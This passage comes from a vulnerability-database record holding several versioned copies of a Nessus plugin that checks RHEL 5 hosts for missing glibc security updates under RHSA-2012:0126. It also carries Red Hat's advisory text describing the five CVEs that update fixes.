reference:\"nscd-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"nscd-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"nscd-2.5-65.el5_7.3\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-devel / glibc-headers / glibc-utils / etc\");\n }\n}\n", "title": "RHEL 5 : glibc (RHSA-2012:0126)", "type": "nessus", "viewCount": 6}, "differentElements": ["cvss"], "edition": 5, "lastseen": "2018-07-30T13:34:30"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:glibc-utils", "p-cpe:/a:redhat:enterprise_linux:glibc", "p-cpe:/a:redhat:enterprise_linux:glibc-common", "p-cpe:/a:redhat:enterprise_linux:glibc-devel", "p-cpe:/a:redhat:enterprise_linux:nscd", "p-cpe:/a:redhat:enterprise_linux:glibc-headers"], "cvelist": ["CVE-2011-4609", "CVE-2010-0830", "CVE-2009-5029", "CVE-2011-1089", "CVE-2009-5064"], "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Updated glibc packages that fix multiple security issues are now available for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThe glibc packages contain the standard C libraries used by multiple programs on the system. These packages contain the standard C and the standard math libraries. Without these two libraries, a Linux system cannot function properly.\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was found in the way the glibc library read timezone files. If a carefully-crafted timezone file was loaded by an application linked against glibc, it could cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application. (CVE-2009-5029)\n\nA flaw was found in the way the ldd utility identified dynamically linked libraries. If an attacker could trick a user into running ldd on a malicious binary, it could result in arbitrary code execution with the privileges of the user running ldd. (CVE-2009-5064)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was found in the way the glibc library loaded ELF (Executable and Linking Format) files. If a carefully-crafted ELF file was loaded by an application linked against glibc, it could cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application. (CVE-2010-0830)\n\nIt was found that the glibc addmntent() function, used by various mount helper utilities, did not handle certain errors correctly when updating the mtab (mounted file systems table) file. If such utilities had the setuid bit set, a local attacker could use this flaw to corrupt the mtab file. (CVE-2011-1089)\n\nA denial of service flaw was found in the remote procedure call (RPC) implementation in glibc. A remote attacker able to open a large number of connections to an RPC service that is using the RPC implementation from glibc, could use this flaw to make that service use an excessive amount of CPU time. (CVE-2011-4609)\n\nRed Hat would like to thank the Ubuntu Security Team for reporting CVE-2010-0830, and Dan Rosenberg for reporting CVE-2011-1089. The Ubuntu Security Team acknowledges Dan Rosenberg as the original reporter of CVE-2010-0830.\n\nUsers should upgrade to these updated packages, which resolve these issues.", "edition": 9, "enchantments": {"score": {"value": 7.2, "vector": "NONE"}}, "hash": "659c7255ee9e4c1c1494e4485566b2fd820365332a9fb5141340e6e68af3d328", "hashmap": [{"hash": "ae0665ae2f88d638e0907d932dfcc493", "key": "cpe"}, {"hash": "6f8115c44826ba13de903bb0d26a7d5b", "key": "cvelist"}, {"hash": "7962711bd7650e97eb287d800fd6fd3a", "key": "description"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "d0d3aea83b783517cc9a19726c25ed46", "key": "references"}, {"hash": "11adcfef0c4ad5230059a01cdd38d503", "key": "modified"}, {"hash": "2c579aa4e476f52de92baf9b41b1db07", "key": "title"}, {"hash": "7c885de43ac8c8fec677c5a50f1ca9e9", "key": "published"}, {"hash": "3b4231700df65bd1e280187eabbb0395", "key": "pluginID"}, {"hash": "e8bafdc9ad5c6f47fe1e6e5fd509b7a9", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "c4f16ed276157b63b39f28c10395355d", "key": "href"}, {"hash": "b46559ea68ec9a13474c3a7776817cfd", "key": "naslFamily"}, {"hash": "5d7243372141ed373d53af4ba405ac9c", "key": "sourceData"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=57929", "id": "REDHAT-RHSA-2012-0126.NASL", "lastseen": "2018-11-27T05:11:06", "modified": "2018-11-26T00:00:00", "naslFamily": "Red Hat Local Security Checks", "objectVersion": "1.3", "pluginID": "57929", "published": "2012-02-14T00:00:00", "references": ["https://access.redhat.com/security/cve/cve-2009-5029", "https://access.redhat.com/security/cve/cve-2011-4609", "https://access.redhat.com/security/cve/cve-2009-5064", "https://access.redhat.com/errata/RHSA-2012:0126", "https://access.redhat.com/security/cve/cve-2011-1089", "https://access.redhat.com/security/cve/cve-2010-0830"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2012:0126. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(57929);\n script_version (\"1.16\");\n script_cvs_date(\"Date: 2018/11/26 11:02:15\");\n\n script_cve_id(\"CVE-2009-5029\", \"CVE-2009-5064\", \"CVE-2010-0830\", \"CVE-2011-1089\", \"CVE-2011-4609\");\n script_bugtraq_id(40063, 46740, 50898, 51439);\n script_xref(name:\"RHSA\", value:\"2012:0126\");\n\n script_name(english:\"RHEL 5 : glibc (RHSA-2012:0126)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated glibc packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system\ncannot function properly.\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library read timezone files. If a\ncarefully-crafted timezone file was loaded by an application linked\nagainst glibc, it could cause the application to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning the application. (CVE-2009-5029)\n\nA flaw was found in the way the ldd utility identified dynamically\nlinked libraries. If an attacker could trick a user into running ldd\non a malicious binary, it could result in arbitrary code execution\nwith the privileges of the user running ldd. (CVE-2009-5064)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library loaded ELF (Executable and Linking\nFormat) files. If a carefully-crafted ELF file was loaded by an\napplication linked against glibc, it could cause the application to\ncrash or, potentially, execute arbitrary code with the privileges of\nthe user running the application. (CVE-2010-0830)\n\nIt was found that the glibc addmntent() function, used by various\nmount helper utilities, did not handle certain errors correctly when\nupdating the mtab (mounted file systems table) file. If such utilities\nhad the setuid bit set, a local attacker could use this flaw to\ncorrupt the mtab file. (CVE-2011-1089)\n\nA denial of service flaw was found in the remote procedure call (RPC)\nimplementation in glibc. A remote attacker able to open a large number\nof connections to an RPC service that is using the RPC implementation\nfrom glibc, could use this flaw to make that service use an excessive\namount of CPU time. (CVE-2011-4609)\n\nRed Hat would like to thank the Ubuntu Security Team for reporting\nCVE-2010-0830, and Dan Rosenberg for reporting CVE-2011-1089. The\nUbuntu Security Team acknowledges Dan Rosenberg as the original\nreporter of CVE-2010-0830.\n\nUsers should upgrade to these updated packages, which resolve these\nissues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-5029\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-5064\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-0830\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-1089\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-4609\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2012:0126\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/02/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/02/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2012:0126\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", reference:\"glibc-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"glibc-common-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"glibc-common-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"glibc-common-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"glibc-devel-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"glibc-headers-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"glibc-headers-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"glibc-headers-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"glibc-utils-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"glibc-utils-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"glibc-utils-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"nscd-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"nscd-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"nscd-2.5-65.el5_7.3\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-devel / glibc-headers / glibc-utils / etc\");\n }\n}\n", "title": "RHEL 5 : glibc (RHSA-2012:0126)", "type": "nessus", "viewCount": 6}, "differentElements": ["description"], "edition": 9, "lastseen": "2018-11-27T05:11:06"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": [], "cvelist": ["CVE-2011-4609", "CVE-2010-0830", "CVE-2009-5029", "CVE-2011-1089", "CVE-2009-5064"], "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Updated glibc packages that fix multiple security issues are now available for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThe glibc packages contain the standard C libraries used by multiple programs on the system. These packages contain the standard C and the standard math libraries. Without these two libraries, a Linux system cannot function properly.\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was found in the way the glibc library read timezone files. If a carefully-crafted timezone file was loaded by an application linked against glibc, it could cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application. (CVE-2009-5029)\n\nA flaw was found in the way the ldd utility identified dynamically linked libraries. If an attacker could trick a user into running ldd on a malicious binary, it could result in arbitrary code execution with the privileges of the user running ldd. (CVE-2009-5064)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was found in the way the glibc library loaded ELF (Executable and Linking Format) files. If a carefully-crafted ELF file was loaded by an application linked against glibc, it could cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application. (CVE-2010-0830)\n\nIt was found that the glibc addmntent() function, used by various mount helper utilities, did not handle certain errors correctly when updating the mtab (mounted file systems table) file. If such utilities had the setuid bit set, a local attacker could use this flaw to corrupt the mtab file. (CVE-2011-1089)\n\nA denial of service flaw was found in the remote procedure call (RPC) implementation in glibc. A remote attacker able to open a large number of connections to an RPC service that is using the RPC implementation from glibc, could use this flaw to make that service use an excessive amount of CPU time. (CVE-2011-4609)\n\nRed Hat would like to thank the Ubuntu Security Team for reporting CVE-2010-0830, and Dan Rosenberg for reporting CVE-2011-1089. The Ubuntu Security Team acknowledges Dan Rosenberg as the original reporter of CVE-2010-0830.\n\nUsers should upgrade to these updated packages, which resolve these issues.", "edition": 2, "enchantments": {}, "hash": "57256a06970130ee99a880d5212a24834b5d28d3904011b0cf2ef9f65b9862a2", "hashmap": [{"hash": "5a5a54611766f3da3ce3cb528f3027a4", "key": "references"}, {"hash": "b7f00b70496e4f2268229628988b3711", "key": "sourceData"}, {"hash": "369eb856f7dc4cfd31b9acc3c0811267", "key": "modified"}, {"hash": "6f8115c44826ba13de903bb0d26a7d5b", "key": "cvelist"}, {"hash": "7962711bd7650e97eb287d800fd6fd3a", "key": "description"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "2c579aa4e476f52de92baf9b41b1db07", "key": "title"}, {"hash": "7c885de43ac8c8fec677c5a50f1ca9e9", "key": "published"}, {"hash": "3b4231700df65bd1e280187eabbb0395", "key": "pluginID"}, {"hash": "e8bafdc9ad5c6f47fe1e6e5fd509b7a9", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "c4f16ed276157b63b39f28c10395355d", "key": "href"}, {"hash": "b46559ea68ec9a13474c3a7776817cfd", "key": "naslFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=57929", "id": "REDHAT-RHSA-2012-0126.NASL", "lastseen": "2017-01-06T02:13:35", "modified": "2017-01-05T00:00:00", "naslFamily": "Red Hat Local Security Checks", "objectVersion": "1.2", "pluginID": "57929", "published": "2012-02-14T00:00:00", "references": ["http://rhn.redhat.com/errata/RHSA-2012-0126.html", "https://www.redhat.com/security/data/cve/CVE-2011-4609.html", "https://www.redhat.com/security/data/cve/CVE-2011-1089.html", "https://www.redhat.com/security/data/cve/CVE-2010-0830.html", "https://www.redhat.com/security/data/cve/CVE-2009-5029.html", "https://www.redhat.com/security/data/cve/CVE-2009-5064.html"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2012:0126. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(57929);\n script_version (\"$Revision: 1.12 $\");\n script_cvs_date(\"$Date: 2017/01/05 16:04:21 $\");\n\n script_cve_id(\"CVE-2009-5029\", \"CVE-2009-5064\", \"CVE-2010-0830\", \"CVE-2011-1089\", \"CVE-2011-4609\");\n script_bugtraq_id(40063, 46740, 50898, 51439);\n script_osvdb_id(65077, 74278, 74883, 77508, 78316);\n script_xref(name:\"RHSA\", value:\"2012:0126\");\n\n script_name(english:\"RHEL 5 : glibc (RHSA-2012:0126)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated glibc packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system\ncannot function properly.\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library read timezone files. If a\ncarefully-crafted timezone file was loaded by an application linked\nagainst glibc, it could cause the application to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning the application. (CVE-2009-5029)\n\nA flaw was found in the way the ldd utility identified dynamically\nlinked libraries. If an attacker could trick a user into running ldd\non a malicious binary, it could result in arbitrary code execution\nwith the privileges of the user running ldd. (CVE-2009-5064)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library loaded ELF (Executable and Linking\nFormat) files. If a carefully-crafted ELF file was loaded by an\napplication linked against glibc, it could cause the application to\ncrash or, potentially, execute arbitrary code with the privileges of\nthe user running the application. (CVE-2010-0830)\n\nIt was found that the glibc addmntent() function, used by various\nmount helper utilities, did not handle certain errors correctly when\nupdating the mtab (mounted file systems table) file. If such utilities\nhad the setuid bit set, a local attacker could use this flaw to\ncorrupt the mtab file. (CVE-2011-1089)\n\nA denial of service flaw was found in the remote procedure call (RPC)\nimplementation in glibc. A remote attacker able to open a large number\nof connections to an RPC service that is using the RPC implementation\nfrom glibc, could use this flaw to make that service use an excessive\namount of CPU time. (CVE-2011-4609)\n\nRed Hat would like to thank the Ubuntu Security Team for reporting\nCVE-2010-0830, and Dan Rosenberg for reporting CVE-2011-1089. The\nUbuntu Security Team acknowledges Dan Rosenberg as the original\nreporter of CVE-2010-0830.\n\nUsers should upgrade to these updated packages, which resolve these\nissues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2009-5029.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2009-5064.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2010-0830.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2011-1089.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2011-4609.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://rhn.redhat.com/errata/RHSA-2012-0126.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/02/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/02/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2017 Tenable Network Security, Inc.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2012:0126\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", reference:\"glibc-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"glibc-common-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"glibc-common-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"glibc-common-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"glibc-devel-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"glibc-headers-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"glibc-headers-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"glibc-headers-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"glibc-utils-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"glibc-utils-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"glibc-utils-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"nscd-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"nscd-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"nscd-2.5-65.el5_7.3\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-devel / glibc-headers / glibc-utils / etc\");\n }\n}\n", "title": "RHEL 5 : glibc (RHSA-2012:0126)", "type": "nessus", "viewCount": 6}, "differentElements": ["cpe"], "edition": 2, "lastseen": "2017-01-06T02:13:35"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2011-4609", "CVE-2010-0830", "CVE-2009-5029", "CVE-2011-1089", "CVE-2009-5064"], "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Updated glibc packages that fix multiple security issues are now available for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThe glibc packages contain the standard C libraries used by multiple programs on the system. These packages contain the standard C and the standard math libraries. Without these two libraries, a Linux system cannot function properly.\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was found in the way the glibc library read timezone files. If a carefully-crafted timezone file was loaded by an application linked against glibc, it could cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application. (CVE-2009-5029)\n\nA flaw was found in the way the ldd utility identified dynamically linked libraries. If an attacker could trick a user into running ldd on a malicious binary, it could result in arbitrary code execution with the privileges of the user running ldd. (CVE-2009-5064)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was found in the way the glibc library loaded ELF (Executable and Linking Format) files. If a carefully-crafted ELF file was loaded by an application linked against glibc, it could cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application. (CVE-2010-0830)\n\nIt was found that the glibc addmntent() function, used by various mount helper utilities, did not handle certain errors correctly when updating the mtab (mounted file systems table) file. If such utilities had the setuid bit set, a local attacker could use this flaw to corrupt the mtab file. (CVE-2011-1089)\n\nA denial of service flaw was found in the remote procedure call 